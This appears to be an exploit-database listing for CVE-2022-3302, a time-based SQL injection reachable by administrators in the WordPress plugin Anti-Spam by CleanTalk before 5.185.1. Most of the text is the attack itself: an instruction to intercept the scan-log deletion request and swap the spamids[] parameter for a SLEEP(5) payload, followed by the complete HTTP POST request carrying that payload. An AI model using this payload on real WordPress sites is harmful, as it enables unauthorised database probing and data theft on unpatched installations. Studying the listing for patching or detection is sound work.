Exploit for Anti-Spam by CleanTalk < 5.185.1 - Admin+ SQLi CVE-2022-3302

Name: Exploit for Anti-Spam by CleanTalk < 5.185.1 - Admin+ SQLi CVE-2022-3302
Rating: 5 (181 reviews)

2022-10-03 | CVSS 1.0

## https://sploitus.com/exploit?id=WPEX-ID:1B5A018D-F2D4-4373-BE1E-5162CC5C928B
When deleting a scan logs (/edit-comments.php?page=ct_check_spam_logs), intercept the request and change the spamids[] parameter to 1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)

POST /wp-admin/edit-comments.php?page=ct_check_spam_logs HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://localhost
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=dd06127571&action=delete&spamids%5B%5D=1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)&action2=delete